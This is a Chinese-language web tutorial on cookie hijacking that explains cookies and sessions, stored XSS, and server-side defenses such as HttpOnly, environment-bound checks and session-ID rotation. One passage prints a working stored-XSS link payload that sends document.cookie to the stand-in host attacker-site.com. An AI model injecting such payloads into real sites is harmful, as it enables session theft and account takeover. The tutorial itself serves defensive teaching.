Web 安全之Cookie劫持详细介绍

所属分类: 网络安全 / 黑客教程 阅读数: 161
收藏 0 赞 0 分享
       1. Cookie是什么?
  2. 窃取的原理是什么?
  3. 系统如何防Cookie劫持呢?

  看完这三个回答, 你就明白哪位传奇大侠是如何成功的!!!
  Cookie:
  HTTP天然是无状态的协议, 为了维持和跟踪用户的状态, 引入了Cookie和Session. Cookie包含了浏览器客户端的用户凭证, 相对较小. Session则维护在服务器, 用于维护相对较大的用户信息.
  用通俗的语言, Cookie是钥匙, Session是锁芯.
  Cookie简单理解就是钥匙, 每次去服务端获取资源, 需要带着这把钥匙, 只有自己的锁芯(资源), 才能打开.
  如果你丢掉了钥匙, 那没办法, 只能配一把钥匙和锁芯.
  但是如果钥匙被别人拿了, 那别人就可以冒充你的身份, 去打开你的锁芯, 从而获取你的信息, 甚至挪用你的资金. 这是非常危险的.
  XSS攻击:
  XSS(Cross Site Scripting)是跨站点脚本攻击的缩写. 其就是利用站点开放的文本编辑并发布的功能, 从而造成攻击.
  其实说的简单一点, 就是输入javascript脚本, 窃取并投递cookie信息到自己的站点.
  比如攻击者以一个普通用户登录进来,然后在输入框中提交以下数据:
<a href=# onclick=\”document.location=\’http://attacker-site.com/xss_collect?m=\’+escape\(document.cookie\)\;\”>快看, 这里有美女在洗澡</a>
攻击者提交了条带<a>标签的数据,该条数据保存于服务器端,而管理员登入时,不小心点击这个链接时,则会把自身的cookie信息, 投递给hacker设定的网址.
http://attacker-site.com/xss_collect/m=xxxxxxyyyyyzzz
  有了该session-id,攻击者在会话有效期内即可获得管理员的权限,并且由于攻击数据已添加入数据库,只要攻击数据未被删除,那么攻击还有可能生效,是持久性的。
  Cookie劫持的防:
  基于XSS攻击, 窃取Cookie信息, 并冒充他人身份.
  服务端如何防呢?
  第一种办法是:
  给Cookie添加HttpOnly属性, 这种属性设置后, 只能在http请求中传递, 在脚本中,document.cookie无法获取到该Cookie值. 对XSS的攻击, 有一定的防御值. 但是对网络拦截, 还是泄露了.
  第二种办法:
  在cookie中添加校验信息, 这个校验信息和当前用户外置环境有些关系,比如ip,user agent等有关.这样当cookie被人劫持了, 并冒用, 但是在服务器端校验的时候, 发现校验值发生了变化, 因此要求重新登录, 这样也是种很好的思路, 去规避cookie劫持.
  第三种办法:
  cookie中session id的定时更换, 让session id按一定频率变换, 同时对用户而言, 该操作是透明的, 这样保证了服务体验的一致性.
更多精彩内容其他人还在看

盘点2016上半年十大APT神秘黑客组织

众所周知,近几年来。世界各大组织都曾遭到APT的神秘攻击,其无孔不入,几乎所有的行业都受到了威胁,下面小编就为大家盘点2016上半年十大APT神秘黑客组织
收藏 0 赞 0 分享

不容小觑的十大互联网恶意软件

这篇文章主要为大家详细介绍了互联网十大恶意软件威胁,十大恶意软件有哪些,每一个恶意软件的特点,感兴趣的小伙伴们可以参考一下
收藏 0 赞 0 分享

如何将共享文件设置为允许读取共享文件禁止复制共享文件、允许打开共享文件而禁止拷贝

这篇文章主要为大家详细介绍了如何将共享文件设置为允许读取共享文件禁止复制共享文件、允许打开共享文件而禁止拷贝共享文件,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
收藏 0 赞 0 分享

大势至电脑文件防泄密系统如何设置网页黑白名单、禁止电脑访问某些网站

这篇文章主要介绍了大势至电脑文件防泄密系统如何设置网页黑白名单、禁止电脑访问某些网站,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
收藏 0 赞 0 分享

如何禁止电脑安装随身WIFI泄露保密文档、禁用无线路由、禁用随身wifi

这篇文章主要介绍了如何禁止电脑安装随身WIFI泄露保密文档、禁用无线路由、禁用随身wifi的相关资料,非常具有实用价值,需要的朋友可以参考下
收藏 0 赞 0 分享

禁止企业商业机密外泄、商业数据如何防复制、保密数据如何防泄漏

企业的商业秘密,作为一种在专利、商标、著作权之外的一项重要的知识产权,是企业得以生存发展的根基。这篇文章给大家介绍了如何禁止企业商业机密外泄、商业数据如何防复制、保密数据如何防泄漏,需要的朋友参考下本文吧
收藏 0 赞 0 分享

聚生网管软件如何实现跨网段网络管理、跨网段监控电脑上网行为

这篇文章主要介绍了聚生网管软件如何实现跨网段网络管理、跨网段监控电脑上网行为的相关资料,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
收藏 0 赞 0 分享

如何防止单位员工窃取公司机密、公司防止数据泄露和防止电脑重要文件外传泄露的方法

如何防止单位员工窃取公司机密、公司防止数据泄露和防止电脑重要文件外传泄露的方法.大势至电脑文件防泄密系统,这款软件安装只要3-5秒,操作十分简单快捷,感兴趣的朋友跟随脚本之家小编一起了解下吧
收藏 0 赞 0 分享

怎么安装、卸载大势至局域网共享文件管理系统、企业共享文档权限设置软件

这篇文章主要介绍了怎么安装、卸载大势至局域网共享文件管理系统、企业共享文档权限设置软件的相关资料,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
收藏 0 赞 0 分享

大势至软件政府机关网络安全管理、上网行为管理解决方案,全面保护政府机关网络安全

大势至网络行为管理系统是国内最早的专业网络管理软件之一,接下来通过本文给大家分享大势至软件政府机关网络安全管理、上网行为管理解决方案,全面保护政府机关网络安全的相关知识,感兴趣的朋友一起看看吧
收藏 0 赞 0 分享
查看更多